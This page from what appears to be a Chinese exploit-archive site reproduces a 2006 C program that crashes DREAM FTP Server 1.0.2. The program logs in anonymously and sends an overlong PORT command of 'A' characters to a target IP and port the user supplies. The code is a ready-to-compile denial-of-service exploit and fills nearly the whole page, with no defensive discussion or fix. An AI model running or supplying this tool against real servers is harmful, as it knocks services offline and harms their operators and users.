首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit
来源:vfocus.net 作者:InTeL 发布时间:2006-12-22  

/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default
which enables anyone to crash the server at will.
But if the anonymous logins have been disabled try it with
a another user/pass account

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


int usage(char *filename)
{
printf("Dream FTP v1.02 DoS exploit\r\n");
printf("By InTeL\r\n");
printf("USAGE: %s <IP_Address> <port>\r\n", filename);

exit(0);
}

int main(int argc, char *argv[])
{
char evilbuf[40], recvbuf[1028];
unsigned short port;
struct sockaddr_in saddr;
struct hostent *he;
WSADATA wsaData;
SOCKET sock;

if(argc != 3)
usage(argv[0]);

port = atoi(argv[2]);
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
printf("Unable to initialize Winsock \n");
exit(1);
}

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
printf("Socket Error \n");
exit(1);
}

if ((he = gethostbyname(argv[1])) == NULL){
printf("Couldnt Resolve %s \n",argv[1]);
exit(1);
}

memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_addr = *((struct in_addr *)he->h_addr);
saddr.sin_port = htons(port);

if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
printf("Connect Error \n");
exit(1);
}

for(int i = 0; i<3;i++){
memset(recvbuf, 0, sizeof(recvbuf));
recv(sock, recvbuf, 1027, 0);
}
printf("Logging in\r\n");

memset(evilbuf, 0,sizeof(evilbuf));
strcpy(evilbuf, "USER Anonymous\r\n"); //USER
send (sock, evilbuf, strlen(evilbuf), 0);

for(i=0;i<4;i++){
memset(recvbuf,0,sizeof(recvbuf));
recv(sock, recvbuf, 1027, 0);
}

memset(evilbuf, 0, sizeof(evilbuf));
strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
send (sock, evilbuf, strlen(evilbuf), 0);

for(i=0; i<3;i++) {
memset(recvbuf, 0, sizeof(recvbuf));
recv(sock, recvbuf, 1027, 0);
}
printf("Building overflow string\r\n");

memset(evilbuf,0,sizeof(evilbuf));
strcpy(evilbuf, "PORT "); //PORT
for(i = 5;i != 36;i++)
evilbuf[i] = 'A';
strcat(evilbuf,"\r\n");

send (sock, evilbuf, strlen(evilbuf), 0);

printf("DoS Attack Done\r\n");
closesocket(sock);

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Http explorer Web Server 1.02
·IXM Easy Personal FTP Server 5
·Ixprim CMS 1.2 Remote Blind SQ
·Enthrallweb ePages (actualpic.
·PHP Advanced Transfer Manager
·File Upload Manager <= 1.0.
·MS Windows (MessageBox) Memory
·Newsletter MX <= 1.0.2 (ID)
·RealPlayer 10.5 (ActiveX Contr
·Ultimate PHP Board <= 2.0b1
·Exploits WinFtp Server Version
·Pagetool CMS <= 1.07 (pt_up
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved